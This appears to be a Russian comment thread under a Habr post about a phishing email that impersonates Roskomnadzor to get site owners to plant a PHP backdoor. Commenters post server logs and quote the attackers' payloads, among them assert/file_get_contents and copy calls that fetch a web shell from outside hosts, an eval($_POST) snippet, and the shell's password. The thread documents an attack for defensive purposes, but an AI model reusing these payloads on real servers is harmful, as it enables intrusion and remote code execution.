Pull to refresh

Comments 39

Honeypot можно сделать и понять, ради чего они это делают.
>> Путь до файла
Это украинец, русский написал бы «путь к файлу»…
Та шо те шо другие то так то сяк пишут.
«Шо те и шо другие» может и пишут.
Мне как украинцу, прожившему 10 лет в рф в глаза всеравно бросается. Взаимопроникновение обычно ограничивается приграничными областями, так что всёравно — палево.
И кстати стиль письма, такие вот «суржиковые» оговорки и речевые обороты могут использоваться для дальнейшего поиска и идентификации атакующего. Так что господа хакеры — пользуйтесь спеллчекером.

Немножко не в тему, но я узнал о слове «суржик» буквально месяц назад.
Теперь оно преследует меня по интернету. Что-то не так.
Посмотри «Бобро поржаловать»
Я бы написал «путь до файла», ни разу не украинец и живу очень далеко от границы.
yandex.ru:
путь до файла — 43 млн. ответов
путь к файлу — 27 млн. ответов
google.com
путь к файлу — About 43,600,000 results (0.20 seconds)
путь до файла — About 623,000 results (0.26 seconds)
Откуда это недружелюбность между народами и разные такие намеки, — Вы либо слишком много телевизор смотрите, либо политики из СМИ перечитали. Разницы нет, хоть ты негр будешь, все равно найдутся нечестные люди, кто захочет воспользоваться твоими слабостями… а национальность тут не причем (равно как возраст, пол и вероисповедание и др.).

И услышал казак:
«Ты идешь воевать
за народную власть
со своим же народом!»
Бывший подъесаул (Тальков Игорь)

P.S. Роскомнадозор рассылку ведет с адреса: Роскомнадзор <zapret-info-out@rkn.gov.ru>

P.P.S. Возможный текст письма:
Направляется уведомление о внесении в «Единый реестр доменных имен, указателей страниц сайтов в сети «Интернет» и сетевых адресов, позволяющих идентифицировать сайты в сети «Интернет», содержащие информацию, распространение которой в Российской Федерации запрещено» следующего(их) указателя (указателей) страницы (страниц) сайта в сети «Интернет»: /какая то ссылка/.

В случае непринятия провайдером хостинга и (или) владельцем сайта мер по удалению запрещенной информации и (или) ограничению доступа к сайту в сети «Интернет», будет принято решение о включении в единый реестр сетевого адреса, позволяющего идентифицировать сайт в сети «Интернет», содержащий информацию, распространение которой в Российской Федерации запрещено, а доступ к нему будет ограничен.

Сведения о включении доменных имен, указателей страниц сайтов сети «Интернет» и сетевых адресов доступны круглосуточно в сети «Интернет» по адресу eais.rkn.gov.ru.

С уважением,
ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ.

А где вы недружелюбность увидели? Человек просто заподозрил (небезосновательно), что это украинец. Недружелюбность проявляют те, кто ему минусов накидали…
Нужно было разместить этот файл, но код поменять таким образом, чтобы вместо уязвимости он сохранял IP и другие данные злоумышленника. И если он не использует прокси и тд., то можно будет в какой-то степени его сдеанонить и уже с его данными написать заявление.
получил такое письмо сегодня ;-))
про развод понял сразу (ну не дотягивает посещение до 3000 уников) — но подход ребята выбрали оригинальный ;-))
Письмо не приходило, но еще вчера, на всякий случай, настроил редирект для этого адреса на natribu.org
Сегодня в логах нашел:

access.log:77.221.130.49 — - [27/Aug/2015:07:50:09 +0300] «GET /reestr/reestr-id128032.php?roskomnadzor=print-439573653*57; HTTP/1.1» 301 184 "-" "-" «77.221.130.49»

access.log:178.132.201.92 — - [27/Aug/2015:08:07:26 +0300] «GET /reestr/reestr-id128032.php?roskomnadzor=print-439573653*57; HTTP/1.1» 301 184 "-" "-" «178.132.201.92»

access.log:5.101.156.31 — - [27/Aug/2015:08:08:09 +0300] «GET /reestr/reestr-id128032.php?roskomnadzor=print-439573653*57; HTTP/1.1» 301 184 "-" "-" «5.101.156.31»

access.log:62.113.86.40 — - [27/Aug/2015:09:02:50 +0300] «GET /reestr/reestr-id128032.php?roskomnadzor=print-439573653*57; HTTP/1.1» 301 184 "-" "-" «62.113.86.40»

access.log:78.108.80.142 — - [27/Aug/2015:09:09:13 +0300] «GET /reestr/reestr-id128032.php?roskomnadzor=print-439573653*57; HTTP/1.1» 301 184 "-" "-" «78.108.80.142»
В более ранней теме писали про запрос phpinfo()… Возможно, кто-то уже решил просканировать рунет и подсчитать попавшихся.
Да, это уже сторонний ботнет начал сканировать уязвимости — в гугле по запросу «print-439573653*57» находится много интересного.
Нарыть бы хороший эксплоит-пак да отдать. Вдруг сработает.
Хм, интересно. Злоумышленниками предполагается, что сайт сделан на php, и других технологий не существует в природе.

А их можно как-нибудь наказать? Во времена диалапа по этой ссылке выложили бы своп для скачки. Вот что-нибудь в этом роде.
Вот что-нибудь в этом роде.
/dev/urandom отдать, пусть качают :)
Сегодня, я думаю, свопу для скачки только обрадуются. Там можно много данных выудить… :)
> Злоумышленниками предполагается, что сайт сделан на php, и других технологий не существует в природе.
Даже если сайт сделан не на php, компилятор php всё равно включён по умолчанию в большинстве unix-like систем.
Расчёт верный.
Эм, перечилите 5 таких систем пожалуйста, я только на макоси видел.
Добавьте в пост признаки того, что это развод. Мало ли кто получит такое письмо и из поисковика на этот пост придёт, пусть полезная информация будет.
Так в заголовке же написано: Необычный развод под видом Роскомнадзора
Пытались так развести… вот что удалось узнать (пост на Хабре прочитал после изысканий):
после включения логирования переменной $_REQUEST по адресу uralpolit.ru/reestr/reestr-id128032.php (предупреждение: без проверочного roskomnadzor идет нецензурщина) идет проверочная команда: roskomnadzor=print-439573653*57; причем с разных ip адресов (если интересно могу выложить список). как только было съимитировано исполнение на стороне сервера ;), а имнно отдача результата −25055698221 появились запросы поинтереснее: assert(file_get_contents(«5.9.164.145/~users700/ac/u/1.txt»)); по указанному адресу еще обертка с контентом file_put_contents('2.php', file_get_contents('http://5.9.164.145/~users700/ac/u/2.txt')); Ну а зхдесь уже сам шелл ;) 5.9.164.145/~users700/ac/u/2.txt
p.s. буду очень благодарен за инвайт на хабр
Если расшифровать код по ссылке, то за парой реплейсов и декодом код дальше не обфусцирован, беглый осмотр говорит о сборе системной инфы — какие модули БД стоят, сколько есть места на диске и прочее подобное
Внутри файла используется авторизация по паролю (md5 пароля захардкожен), пароль до md5 — «functionderty»
это именно шелл… например в теле функции есть исполнение переменной, полученной из POST:
function actionPhp() { 
    //... 
    eval($_POST['p1']);
    //...
}

ну и если исполнить там куча формочек в том числе и для сбора инфы и выполнения различных действий на сервере
У меня вот в что в лог попало:
{«request»:{«roskomnadzor»:«copy('http://ewgames.gq/123.txt','/var/www/1123.php');»}
с 79.105.98.88
UFO just landed and posted this here
FAIL. Ведь всем же известно, что роскомнадзор не присылает уведомлений.
Когда увидел КПДВ, захотелось написать статью для бложека, сочетающую все «плюсы» с диаграммы.
Вот такое аналогичное было типа от REG.RU в январе:
картинка
image
мне только что пришло похожее, только якобы от RU-CENTER, support@nic.tech, с требованием подтвердить управление доменом.

Письмо написано и оформлено весьма грамотно, чуть не повелся.
Сделать предлагают аналогичное, только код в пхп чуть отличается
assert(stripslashes($_REQUEST[BWSV3I]));

2021, разводка до сих пор применяется.
Sign up to leave a comment.

Articles